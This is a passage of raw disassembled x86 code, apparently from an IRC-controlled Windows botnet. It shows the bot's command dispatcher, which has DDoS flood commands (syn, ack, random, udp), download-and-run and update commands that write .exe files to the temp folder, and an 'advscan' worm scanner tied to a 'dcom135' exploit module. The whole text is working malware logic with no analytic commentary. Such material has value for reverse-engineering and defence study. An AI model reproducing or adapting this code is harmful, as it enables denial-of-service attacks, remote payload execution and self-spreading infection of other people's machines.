test eax, eax
jz short loc_40E625
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aIrc_m ; "irc.m"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40E687
loc_40E625: ; CODE XREF: sub_40ABFE+3A08�j
cmp [ebp+var_2D4], 0
jz short loc_40E67F
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName] ; SubStr
push [ebp+var_2D4] ; Str
call _strstr
pop ecx
pop ecx
mov dword ptr [ebp+var_CF4], eax
cmp dword ptr [ebp+var_CF4], 0
jz short loc_40E67F
push dword ptr [ebp+var_CF4] ; char
push offset aModeS ; "MODE %s\r\n"
push [ebp+s] ; int
call sub_40A03C
add esp, 0Ch
push dword ptr [ebp+var_CF4] ; char
push offset dword_42339C ; Format
call sub_4091D3
pop ecx
pop ecx
loc_40E67F: ; CODE XREF: sub_40ABFE+3A2E�j
; sub_40ABFE+3A57�j
mov eax, [ebp+arg_24]
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40E687: ; CODE XREF: sub_40ABFE+3A25�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aUp ; "up"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz loc_40E8FB
mov eax, [ebp+var_BC]
push dword ptr [ebp+eax*4+var_98] ; Str2
push offset aNeox ; "NeoX"
call _strcmp
pop ecx
pop ecx
test eax, eax
jz loc_40E8AD
lea eax, [ebp+Buffer]
push eax ; lpBuffer
push 104h ; nBufferLength
call ds:GetTempPathA ; GetTempPathA
push 0FFh ; Count
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName] ; Source
lea eax, [ebp+var_F18]
push eax ; Dest
call _strncpy
add esp, 0Ch
lea eax, [ebp+var_FB8]
push eax
call sub_40F9B6
pop ecx
push eax
lea eax, [ebp+Buffer]
push eax
push offset aSS_exe ; "%s%s.exe"
lea eax, [ebp+var_E18]
push eax ; Dest
call _sprintf
add esp, 10h
mov [ebp+var_D14], 1
and [ebp+var_D10], 0
mov eax, [ebp+var_BC]
cmp [ebp+eax*4+var_94], 0
jz short loc_40E767
push 10h ; Radix
push 0 ; EndPtr
mov eax, [ebp+var_BC]
push [ebp+eax*4+var_94] ; Str
call _strtoul
add esp, 0Ch
mov [ebp+var_1944], eax
jmp short loc_40E76E
; ---------------------------------------------------------------------------
loc_40E767: ; CODE XREF: sub_40ABFE+3B46�j
and [ebp+var_1944], 0
loc_40E76E: ; CODE XREF: sub_40ABFE+3B67�j
mov eax, [ebp+var_1944]
mov [ebp+var_D08], eax
mov eax, [ebp+var_BC]
cmp dword ptr [ebp+eax*4+var_90], 0
jz short loc_40E7A5
mov eax, [ebp+var_BC]
push dword ptr [ebp+eax*4+var_90] ; Str
call _atoi
pop ecx
mov [ebp+var_1948], eax
jmp short loc_40E7AC
; ---------------------------------------------------------------------------
loc_40E7A5: ; CODE XREF: sub_40ABFE+3B8A�j
and [ebp+var_1948], 0
loc_40E7AC: ; CODE XREF: sub_40ABFE+3BA5�j
mov eax, [ebp+var_1948]
mov [ebp+var_D0C], eax
movzx eax, [ebp+var_36F]
mov [ebp+var_D04], eax
mov eax, [ebp+s]
mov [ebp+var_F9C], eax
push 7Fh ; Count
push dword ptr [ebp+var_98] ; Source
lea eax, [ebp+var_F98]
push eax ; Dest
call _strncpy
add esp, 0Ch
mov eax, [ebp+var_85C]
mov [ebp+var_CFC], eax
mov eax, [ebp+var_4]
mov [ebp+var_D00], eax
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName]
push offset unk_4233D4 ; Format
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
push [ebp+s] ; int
push 17h ; int
lea eax, [ebp+Dst]
push eax ; Source
call sub_410231
add esp, 0Ch
mov [ebp+var_D18], eax
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
push 0 ; dwCreationFlags
lea eax, [ebp+var_F9C]
push eax ; lpParameter
push offset sub_4095D3 ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call ds:CreateThread ; CreateThread
mov ecx, [ebp+var_D18]
imul ecx, 234h
mov dword_42B554[ecx], eax
mov eax, [ebp+var_D18]
imul eax, 234h
cmp dword_42B554[eax], 0
jz short loc_40E890
loc_40E87B: ; CODE XREF: sub_40ABFE+3C8E�j
cmp [ebp+var_CF8], 0
jnz short loc_40E88E
push 32h ; dwMilliseconds
call ds:Sleep ; Sleep
jmp short loc_40E87B
; ---------------------------------------------------------------------------
loc_40E88E: ; CODE XREF: sub_40ABFE+3C84�j
jmp short loc_40E8AB
; ---------------------------------------------------------------------------
loc_40E890: ; CODE XREF: sub_40ABFE+3C7B�j
call ds:GetLastError
push eax
push offset unk_423410 ; Format
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_40E8AB: ; CODE XREF: sub_40ABFE:loc_40E88E�j
jmp short loc_40E8C0
; ---------------------------------------------------------------------------
loc_40E8AD: ; CODE XREF: sub_40ABFE+3AC5�j
push offset unk_42345C ; Format
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_40E8C0: ; CODE XREF: sub_40ABFE:loc_40E8AB�j
cmp [ebp+var_4], 0
jnz short loc_40E8E6
push 0
push [ebp+var_85C]
lea eax, [ebp+Dst]
push eax
push dword ptr [ebp+var_98]
push [ebp+s]
call sub_40A08D
add esp, 14h
loc_40E8E6: ; CODE XREF: sub_40ABFE+3CC6�j
lea eax, [ebp+Dst]
push eax
call sub_40913D
pop ecx
mov eax, [ebp+arg_24]
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40E8FB: ; CODE XREF: sub_40ABFE+3AA4�j
mov eax, [ebp+var_BC]
cmp [ebp+eax*4+var_94], 0
jnz short loc_40E913
push 1
pop eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40E913: ; CODE XREF: sub_40ABFE+3D0B�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aDdos_syn_0 ; "ddos.syn"
call _strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_40E96E
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aDdos_ack_0 ; "ddos.ack"
call _strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_40E96E
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aDdos_random_0 ; "ddos.random"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz loc_40EAE8
loc_40E96E: ; CODE XREF: sub_40ABFE+3D30�j
; sub_40ABFE+3D4D�j
push 0FFh ; Count
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName] ; Source
lea eax, [ebp+var_1348]
push eax ; Dest
call _strncpy
add esp, 0Ch
push 7Fh ; Count
mov eax, [ebp+var_BC]
push dword ptr [ebp+eax*4+var_98] ; Source
lea eax, [ebp+var_11C8]
push eax ; Dest
call _strncpy
add esp, 0Ch
push 7Fh ; Count
mov eax, [ebp+var_BC]
push [ebp+eax*4+var_94] ; Source
lea eax, [ebp+var_1148]
push eax ; Dest
call _strncpy
add esp, 0Ch
push 7Fh ; Count
push dword ptr [ebp+var_98] ; Source
lea eax, [ebp+var_1248]
push eax ; Dest
call _strncpy
add esp, 0Ch
push 20h ; Count
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Source
lea eax, [ebp+var_1368]
push eax ; Dest
call _strncpy
add esp, 0Ch
mov eax, [ebp+var_85C]
mov [ebp+var_10C8], eax
mov eax, [ebp+var_4]
mov [ebp+var_10C4], eax
mov eax, [ebp+s]
mov [ebp+var_1370], eax
push 0 ; int
push 0Ah ; int
lea eax, [ebp+Dst]
push eax ; Source
call sub_410231
add esp, 0Ch
mov [ebp+var_136C], eax
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
push 0 ; dwCreationFlags
lea eax, [ebp+var_1370]
push eax ; lpParameter
push offset sub_40634F ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call ds:CreateThread ; CreateThread
mov ecx, [ebp+var_136C]
imul ecx, 234h
mov dword_42B554[ecx], eax
mov eax, [ebp+var_136C]
imul eax, 234h
cmp dword_42B554[eax], 0
jz short loc_40EA92
loc_40EA7D: ; CODE XREF: sub_40ABFE+3E90�j
cmp [ebp+var_10C0], 0
jnz short loc_40EA90
push 32h ; dwMilliseconds
call ds:Sleep ; Sleep
jmp short loc_40EA7D
; ---------------------------------------------------------------------------
loc_40EA90: ; CODE XREF: sub_40ABFE+3E86�j
jmp short loc_40EAE0
; ---------------------------------------------------------------------------
loc_40EA92: ; CODE XREF: sub_40ABFE+3E7D�j
call ds:GetLastError
push eax
push offset aDdosFailedToSt ; "[DDOS]: Failed to start ddos thread, er"...
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_4], 0
jnz short loc_40EAD3
push 0
push [ebp+var_85C]
lea eax, [ebp+Dst]
push eax
push dword ptr [ebp+var_98]
push [ebp+s]
call sub_40A08D
add esp, 14h
loc_40EAD3: ; CODE XREF: sub_40ABFE+3EB3�j
lea eax, [ebp+Dst]
push eax
call sub_40913D
pop ecx
loc_40EAE0: ; CODE XREF: sub_40ABFE:loc_40EA90�j
push 1
pop eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40EAE8: ; CODE XREF: sub_40ABFE:loc_40C0D4�j
; sub_40ABFE+27DD�j ...
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aDdos_udp ; "ddos.udp"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz loc_40EC5B
push 0FFh ; Count
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName] ; Source
lea eax, [ebp+var_1504]
push eax ; Dest
call _strncpy
add esp, 0Ch
mov eax, [ebp+var_BC]
push dword ptr [ebp+eax*4+var_98] ; Str
call _atoi
pop ecx
mov [ebp+var_1384], eax
mov eax, [ebp+var_BC]
push [ebp+eax*4+var_94] ; Str
call _atoi
pop ecx
mov [ebp+var_1380], eax
push 7Fh ; Count
push dword ptr [ebp+var_98] ; Source
lea eax, [ebp+var_1404]
push eax ; Dest
call _strncpy
add esp, 0Ch
mov eax, [ebp+var_85C]
mov [ebp+var_137C], eax
mov eax, [ebp+var_4]
mov [ebp+var_1378], eax
mov eax, [ebp+s]
mov [ebp+var_150C], eax
push 0 ; int
push 0Fh ; int
lea eax, [ebp+Dst]
push eax ; Source
call sub_410231
add esp, 0Ch
mov [ebp+var_1508], eax
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
push 0 ; dwCreationFlags
lea eax, [ebp+var_150C]
push eax ; lpParameter
push offset sub_406B0C ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call ds:CreateThread ; CreateThread
mov ecx, [ebp+var_1508]
imul ecx, 234h
mov dword_42B554[ecx], eax
mov eax, [ebp+var_1508]
imul eax, 234h
cmp dword_42B554[eax], 0
jz short loc_40EC05
loc_40EBF0: ; CODE XREF: sub_40ABFE+4003�j
cmp [ebp+var_1374], 0
jnz short loc_40EC03
push 32h ; dwMilliseconds
call ds:Sleep ; Sleep
jmp short loc_40EBF0
; ---------------------------------------------------------------------------
loc_40EC03: ; CODE XREF: sub_40ABFE+3FF9�j
jmp short loc_40EC53
; ---------------------------------------------------------------------------
loc_40EC05: ; CODE XREF: sub_40ABFE+3FF0�j
call ds:GetLastError
push eax
push offset aDdosFailedTo_0 ; "[DDOS]: Failed to start ddos thread, er"...
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_4], 0
jnz short loc_40EC46
push 0
push [ebp+var_85C]
lea eax, [ebp+Dst]
push eax
push dword ptr [ebp+var_98]
push [ebp+s]
call sub_40A08D
add esp, 14h
loc_40EC46: ; CODE XREF: sub_40ABFE+4026�j
lea eax, [ebp+Dst]
push eax
call sub_40913D
pop ecx
loc_40EC53: ; CODE XREF: sub_40ABFE:loc_40EC03�j
push 1
pop eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40EC5B: ; CODE XREF: sub_40ABFE+3F05�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aDwl ; "dwl"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz loc_40EEC0
push 0FFh ; Count
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName] ; Source
lea eax, [ebp+var_1730]
push eax ; Dest
call _strncpy
add esp, 0Ch
push 0FFh ; Count
mov eax, [ebp+var_BC]
push dword ptr [ebp+eax*4+var_98] ; Source
lea eax, [ebp+var_1630]
push eax ; Dest
call _strncpy
add esp, 0Ch
and [ebp+var_152C], 0
mov eax, [ebp+var_BC]
cmp [ebp+eax*4+var_94], 0
jz short loc_40ECF0
mov eax, [ebp+var_BC]
push [ebp+eax*4+var_94] ; Str
call _atoi
pop ecx
mov [ebp+var_194C], eax
jmp short loc_40ECF7
; ---------------------------------------------------------------------------
loc_40ECF0: ; CODE XREF: sub_40ABFE+40D5�j
and [ebp+var_194C], 0
loc_40ECF7: ; CODE XREF: sub_40ABFE+40F0�j
mov eax, [ebp+var_194C]
mov [ebp+var_1528], eax
mov eax, [ebp+var_BC]
cmp dword ptr [ebp+eax*4+var_90], 0
jz short loc_40ED34
push 10h ; Radix
push 0 ; EndPtr
mov eax, [ebp+var_BC]
push dword ptr [ebp+eax*4+var_90] ; Str
call _strtoul
add esp, 0Ch
mov [ebp+var_1950], eax
jmp short loc_40ED3B
; ---------------------------------------------------------------------------
loc_40ED34: ; CODE XREF: sub_40ABFE+4113�j
and [ebp+var_1950], 0
loc_40ED3B: ; CODE XREF: sub_40ABFE+4134�j
mov eax, [ebp+var_1950]
mov [ebp+var_1520], eax
mov eax, [ebp+var_BC]
cmp [ebp+eax*4+var_8C], 0
jz short loc_40ED72
mov eax, [ebp+var_BC]
push [ebp+eax*4+var_8C] ; Str
call _atoi
pop ecx
mov [ebp+var_1954], eax
jmp short loc_40ED79
; ---------------------------------------------------------------------------
loc_40ED72: ; CODE XREF: sub_40ABFE+4157�j
and [ebp+var_1954], 0
loc_40ED79: ; CODE XREF: sub_40ABFE+4172�j
mov eax, [ebp+var_1954]
mov [ebp+var_1524], eax
movzx eax, [ebp+var_36F]
mov [ebp+var_151C], eax
mov eax, [ebp+s]
mov [ebp+var_17B4], eax
push 7Fh ; Count
push dword ptr [ebp+var_98] ; Source
lea eax, [ebp+var_17B0]
push eax ; Dest
call _strncpy
add esp, 0Ch
mov eax, [ebp+var_85C]
mov [ebp+var_1514], eax
mov eax, [ebp+var_4]
mov [ebp+var_1518], eax
mov eax, [ebp+var_BC]
push dword ptr [ebp+eax*4+var_98]
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName]
push offset unk_423548 ; Format
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 10h
push [ebp+s] ; int
push 16h ; int
lea eax, [ebp+Dst]
push eax ; Source
call sub_410231
add esp, 0Ch
mov [ebp+var_1530], eax
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
push 0 ; dwCreationFlags
lea eax, [ebp+var_17B4]
push eax ; lpParameter
push offset sub_4095D3 ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call ds:CreateThread ; CreateThread
mov ecx, [ebp+var_1530]
imul ecx, 234h
mov dword_42B554[ecx], eax
mov eax, [ebp+var_1530]
imul eax, 234h
cmp dword_42B554[eax], 0
jz short loc_40EE6A
loc_40EE55: ; CODE XREF: sub_40ABFE+4268�j
cmp [ebp+var_1510], 0
jnz short loc_40EE68
push 32h ; dwMilliseconds
call ds:Sleep ; Sleep
jmp short loc_40EE55
; ---------------------------------------------------------------------------
loc_40EE68: ; CODE XREF: sub_40ABFE+425E�j
jmp short loc_40EE85
; ---------------------------------------------------------------------------
loc_40EE6A: ; CODE XREF: sub_40ABFE+4255�j
call ds:GetLastError
push eax
push offset unk_423584 ; Format
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_40EE85: ; CODE XREF: sub_40ABFE:loc_40EE68�j
cmp [ebp+var_4], 0
jnz short loc_40EEAB
push 0
push [ebp+var_85C]
lea eax, [ebp+Dst]
push eax
push dword ptr [ebp+var_98]
push [ebp+s]
call sub_40A08D
add esp, 14h
loc_40EEAB: ; CODE XREF: sub_40ABFE+428B�j
lea eax, [ebp+Dst]
push eax
call sub_40913D
pop ecx
push 1
pop eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40EEC0: ; CODE XREF: sub_40ABFE+4078�j
mov eax, [ebp+var_BC]
cmp dword ptr [ebp+eax*4+var_90], 0
jnz short loc_40EED8
push 1
pop eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40EED8: ; CODE XREF: sub_40ABFE+42D0�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+Str2] ; Str2
push offset aAdvscan ; "advscan"
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz loc_40F50F
push 8
call sub_4105E0
pop ecx
mov [ebp+var_17B8], eax
mov eax, [ebp+var_BC]
push dword ptr [ebp+eax*4+var_98] ; Str
call _atoi
pop ecx
mov ecx, [ebp+var_17B8]
add ecx, eax
cmp ecx, 0C8h
jle short loc_40EF69
push [ebp+var_17B8]
push offset aScanAlreadyDSc ; "[SCAN]: Already %d scanning threads. To"...
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
push 0
push [ebp+var_85C]
lea eax, [ebp+Dst]
push eax
push dword ptr [ebp+var_98]
push [ebp+s]
call sub_40A08D
add esp, 14h
jmp loc_40F50F
; ---------------------------------------------------------------------------
loc_40EF69: ; CODE XREF: sub_40ABFE+432A�j
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName] ; Str
call _atoi
pop ecx
mov [ebp+var_17F0], eax
mov eax, [ebp+var_BC]
push dword ptr [ebp+eax*4+var_98] ; Str
call _atoi
pop ecx
mov [ebp+var_17D8], eax
mov eax, [ebp+var_BC]
push [ebp+eax*4+var_94] ; Str
call _atoi
pop ecx
mov [ebp+var_17EC], eax
cmp [ebp+var_17EC], 5
jnb short loc_40EFC9
mov [ebp+var_1958], 5
jmp short loc_40EFD5
; ---------------------------------------------------------------------------
loc_40EFC9: ; CODE XREF: sub_40ABFE+43BD�j
mov eax, [ebp+var_17EC]
mov [ebp+var_1958], eax
loc_40EFD5: ; CODE XREF: sub_40ABFE+43C9�j
mov eax, [ebp+var_1958]
mov [ebp+var_17EC], eax
cmp [ebp+var_17EC], 3Ch
jbe short loc_40EFF6
mov [ebp+var_195C], 3Ch
jmp short loc_40F002
; ---------------------------------------------------------------------------
loc_40EFF6: ; CODE XREF: sub_40ABFE+43EA�j
mov eax, [ebp+var_17EC]
mov [ebp+var_195C], eax
loc_40F002: ; CODE XREF: sub_40ABFE+43F6�j
mov eax, [ebp+var_195C]
mov [ebp+var_17EC], eax
mov eax, [ebp+var_BC]
push dword ptr [ebp+eax*4+var_90] ; Str
call _atoi
pop ecx
mov [ebp+var_17E8], eax
cmp [ebp+var_17E8], 320h
jbe short loc_40F03F
mov [ebp+var_1960], 320h
jmp short loc_40F04B
; ---------------------------------------------------------------------------
loc_40F03F: ; CODE XREF: sub_40ABFE+4433�j
mov eax, [ebp+var_17E8]
mov [ebp+var_1960], eax
loc_40F04B: ; CODE XREF: sub_40ABFE+443F�j
mov eax, [ebp+var_1960]
mov [ebp+var_17E8], eax
or [ebp+var_17D4], 0FFFFFFFFh
and [ebp+var_5D8], 0
jmp short loc_40F074
; ---------------------------------------------------------------------------
loc_40F067: ; CODE XREF: sub_40ABFE:loc_40F0D0�j
mov eax, [ebp+var_5D8]
inc eax
mov [ebp+var_5D8], eax
loc_40F074: ; CODE XREF: sub_40ABFE+4467�j
mov eax, [ebp+var_5D8]
imul eax, 3Ch
cmp dword_41ED98[eax], 0
jz short loc_40F0D2
mov eax, [ebp+var_BC]
push [ebp+eax*4+lpFileName] ; Str2
mov eax, [ebp+var_5D8]
imul eax, 3Ch
add eax, offset aDcom135_0 ; "dcom135"
push eax ; Str1
call _strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40F0D0
mov eax, [ebp+var_5D8]
imul eax, 3Ch
mov eax, dword_41ED98[eax]
mov [ebp+var_17F0], eax
mov eax, [ebp+var_5D8]
mov [ebp+var_17D4], eax
jmp short loc_40F0D2
; ---------------------------------------------------------------------------
loc_40F0D0: ; CODE XREF: sub_40ABFE+44AD�j
jmp short loc_40F067
; ---------------------------------------------------------------------------
loc_40F0D2: ; CODE XREF: sub_40ABFE+4486�j
; sub_40ABFE+44D0�j
cmp [ebp+var_17F0], 0
jnz short loc_40F129
push offset aScanFailedTo_0 ; "[SCAN]: Failed to start scan, port is i"...
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
cmp [ebp+var_4], 0
jnz short loc_40F114
push 0
push [ebp+var_85C]
lea eax, [ebp+Dst]
push eax
push dword ptr [ebp+var_98]
push [ebp+s]
call sub_40A08D
add esp, 14h
loc_40F114: ; CODE XREF: sub_40ABFE+44F4�j
lea eax, [ebp+Dst]
push eax
call sub_40913D
pop ecx
push 1
pop eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40F129: ; CODE XREF: sub_40ABFE+44DB�j
mov eax, [ebp+var_BC]
cmp [ebp+eax*4+var_8C], 0
jz short loc_40F193
mov eax, [ebp+var_BC]
mov eax, [ebp+eax*4+var_8C]
movsx eax, byte ptr [eax]
cmp eax, 23h
jz short loc_40F193
mov eax, [ebp+var_BC]
push [ebp+eax*4+var_8C] ; Format
push 10h ; Count
lea eax, [ebp+var_1904]
push eax ; Dest
call __snprintf
add esp, 0Ch
push 78h ; Val
mov eax, [ebp+var_BC]
push [ebp+eax*4+var_8C] ; Str
call _strchr
pop ecx
pop ecx
neg eax
sbb eax, eax
neg eax
mov [ebp+var_17C4], eax
jmp loc_40F306
; ---------------------------------------------------------------------------
loc_40F193: ; CODE XREF: sub_40ABFE+4539�j
; sub_40ABFE+454E�j
movzx eax, [ebp+var_373]
test eax, eax
jnz short loc_40F1B8
movzx eax, [ebp+var_372]
test eax, eax
jnz short loc_40F1B8
movzx eax, [ebp+var_362]
test eax, eax
jz loc_40F2B8
loc_40F1B8: ; CODE XREF: sub_40ABFE+459E�j
; sub_40ABFE+45A9�j
mov [ebp+namelen], 10h
lea eax, [ebp+namelen]
push eax ; namelen
lea eax, [ebp+name]
push eax ; name
push [ebp+s] ; s
call ds:getsockname ; getsockname
movzx eax, [ebp+var_373]
neg eax
sbb eax, eax
and ax, 100h
add eax, 0FFFFh
mov ecx, dword ptr [ebp+name.sa_data+2]
and ecx, eax
mov dword ptr [ebp+name.sa_data+2], ecx
push 10h ; Count
push dword ptr [ebp+name.sa_data+2] ; in
call ds:inet_ntoa ; inet_ntoa
push eax ; Source
lea eax, [ebp+var_1904]
push eax ; Dest
call _strncpy
add esp, 0Ch
movzx eax, [ebp+var_362]
test eax, eax
jz loc_40F2AF
movzx eax, [ebp+var_373]
neg eax
sbb eax, eax
neg eax
inc eax
inc eax
mov [ebp+var_1924], eax
push 30h ; Ch
lea eax, [ebp+var_1904]
push eax ; Str
call _strrchr
pop ecx
pop ecx
mov [ebp+var_191C], eax
and [ebp+var_1920], 0
jmp short loc_40F289
; ---------------------------------------------------------------------------
loc_40F25C: ; CODE XREF: sub_40ABFE+46A3�j
mov eax, [ebp+var_191C]
mov byte ptr [eax], 78h
push 30h ; Ch
lea eax, [ebp+var_1904]
push eax ; Str
call _strrchr
pop ecx
pop ecx
mov [ebp+var_191C], eax
mov al, [ebp+var_1920]
add al, 1
mov [ebp+var_1920], al
loc_40F289: ; CODE XREF: sub_40ABFE+465C�j
movsx eax, [ebp+var_1920]
cmp eax, [ebp+var_1924]
jge short loc_40F2A3
cmp [ebp+var_191C], 0
jz short loc_40F2A3
jmp short loc_40F25C
; ---------------------------------------------------------------------------
loc_40F2A3: ; CODE XREF: sub_40ABFE+4698�j
; sub_40ABFE+46A1�j
mov [ebp+var_17C4], 1
jmp short loc_40F2B6
; ---------------------------------------------------------------------------
loc_40F2AF: ; CODE XREF: sub_40ABFE+4624�j
and [ebp+var_17C4], 0
loc_40F2B6: ; CODE XREF: sub_40ABFE+46AF�j
jmp short loc_40F306
; ---------------------------------------------------------------------------
loc_40F2B8: ; CODE XREF: sub_40ABFE+45B4�j
push offset aScanFailedTo_1 ; "[SCAN]: Failed to start scan, no IP spe"...
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
cmp [ebp+var_4], 0
jnz short loc_40F2F1
push 0
push [ebp+var_85C]
lea eax, [ebp+Dst]
push eax
push dword ptr [ebp+var_98]
push [ebp+s]
call sub_40A08D
add esp, 14h
loc_40F2F1: ; CODE XREF: sub_40ABFE+46D1�j
lea eax, [ebp+Dst]
push eax
call sub_40913D
pop ecx
push 1
pop eax
jmp loc_40F512
; ---------------------------------------------------------------------------
loc_40F306: ; CODE XREF: sub_40ABFE+4590�j
; sub_40ABFE:loc_40F2B6�j
mov eax, [ebp+s]
mov [ebp+var_17F4], eax
mov eax, [ebp+var_85C]
mov [ebp+var_17CC], eax
mov eax, [ebp+var_4]
mov [ebp+var_17C8], eax
push dword ptr [ebp+var_98] ; Format
push 80h ; Count
lea eax, [ebp+var_18F4]
push eax ; Dest
call __snprintf
add esp, 0Ch
mov eax, [ebp+var_BC]
cmp [ebp+eax*4+var_88], 0
jz short loc_40F371
mov eax, [ebp+var_BC]
push [ebp+eax*4+var_88] ; Format
push 80h ; Count
lea eax, [ebp+var_1874]
push eax ; Dest
call __snprintf
add esp, 0Ch
jmp short loc_40F3F0
; ---------------------------------------------------------------------------
loc_40F371: ; CODE XREF: sub_40ABFE+474E�j
mov eax, [ebp+var_BC]
cmp [ebp+eax*4+var_8C], 0
jz short loc_40F3B9
mov eax, [ebp+var_BC]
mov eax, [ebp+eax*4+var_8C]
movsx eax, byte ptr [eax]
cmp eax, 23h
jnz short loc_40F3B9
mov eax, [ebp+var_BC]
push [ebp+eax*4+var_8C] ; Format
push 80h ; Count
lea eax, [ebp+var_1874]
push eax ; Dest
call __snprintf
add esp, 0Ch
jmp short loc_40F3F0
; ---------------------------------------------------------------------------
loc_40F3B9: ; CODE XREF: sub_40ABFE+4781�j
; sub_40ABFE+4796�j
push offset byte_470268 ; Str2
push offset aExp_1 ; "#!exp!#"
call _strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_40F3E9
push offset aExp_1 ; "#!exp!#"
push 80h ; Count
lea eax, [ebp+var_1874]
push eax ; Dest
call __snprintf
add esp, 0Ch
jmp short loc_40F3F0
; ---------------------------------------------------------------------------
loc_40F3E9: ; CODE XREF: sub_40ABFE+47CE�j
and [ebp+var_1874], 0
loc_40F3F0: ; CODE XREF: sub_40ABFE+4771�j
; sub_40ABFE+47B9�j ...
cmp [ebp+var_17C4], 0
jz short loc_40F405
mov [ebp+var_1964], offset aRandom_0 ; "Random"
jmp short loc_40F40F
; ---------------------------------------------------------------------------
loc_40F405: ; CODE XREF: sub_40ABFE+47F9�j
mov [ebp+var_1964], offset aSequential_0 ; "Sequential"
loc_40F40F: ; CODE XREF: sub_40ABFE+4805�j
push [ebp+var_17D8]
push [ebp+var_17E8]
push [ebp+var_17EC]
push [ebp+var_17F0]
lea eax, [ebp+var_1904]
push eax
push [ebp+var_1964]
push offset aScanSPortScanS ; "[SCAN]: %s Port Scan started on %s:%d w"...
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 20h
push 0 ; int
push 8 ; int
lea eax, [ebp+Dst]
push eax ; Source
call sub_410231
add esp, 0Ch
mov [ebp+var_17E4], eax
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
push 0 ; dwCreationFlags
lea eax, [ebp+var_1904]
push eax ; lpParameter
push offset sub_405A2E ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call ds:CreateThread ; CreateThread
mov ecx, [ebp+var_17E4]
imul ecx, 234h
mov dword_42B554[ecx], eax
mov eax, [ebp+var_17E4]
imul eax, 234h
cmp dword_42B554[eax], 0
jz short loc_40F4BC
loc_40F4A7: ; CODE XREF: sub_40ABFE+48BA�j
cmp [ebp+var_17C0], 0
jnz short loc_40F4BA
push 32h ; dwMilliseconds
call ds:Sleep ; Sleep
jmp short loc_40F4A7
; ---------------------------------------------------------------------------
loc_40F4BA: ; CODE XREF: sub_40ABFE+48B0�j
jmp short loc_40F4D7
; ---------------------------------------------------------------------------
loc_40F4BC: ; CODE XREF: sub_40ABFE+48A7�j
call ds:GetLastError
push eax
push offset aScanFailedTo_2 ; "[SCAN]: Failed to start scan thread, er"...
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_40F4D7: ; CODE XREF: sub_40ABFE:loc_40F4BA�j
cmp [ebp+var_4], 0
jnz short loc_40F4FD
push 0
push [ebp+var_85C]
lea eax, [ebp+Dst]
push eax
push dword ptr [ebp+var_98]
push [ebp+s]
call sub_40A08D
add esp, 14h
loc_40F4FD: ; CODE XREF: sub_40ABFE+48DD�j
lea eax, [ebp+Dst]
push eax
call sub_40913D
pop ecx
push 1
pop eax
jmp short loc_40F512
; ---------------------------------------------------------------------------
loc_40F50F: ; CODE XREF: sub_40ABFE+94B�j
; sub_40ABFE+958�j ...
mov eax, [ebp+arg_24]
loc_40F512: ; CODE XREF: sub_40ABFE+68�j
; sub_40ABFE+13B�j ...
pop esi
leave
retn
sub_40ABFE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
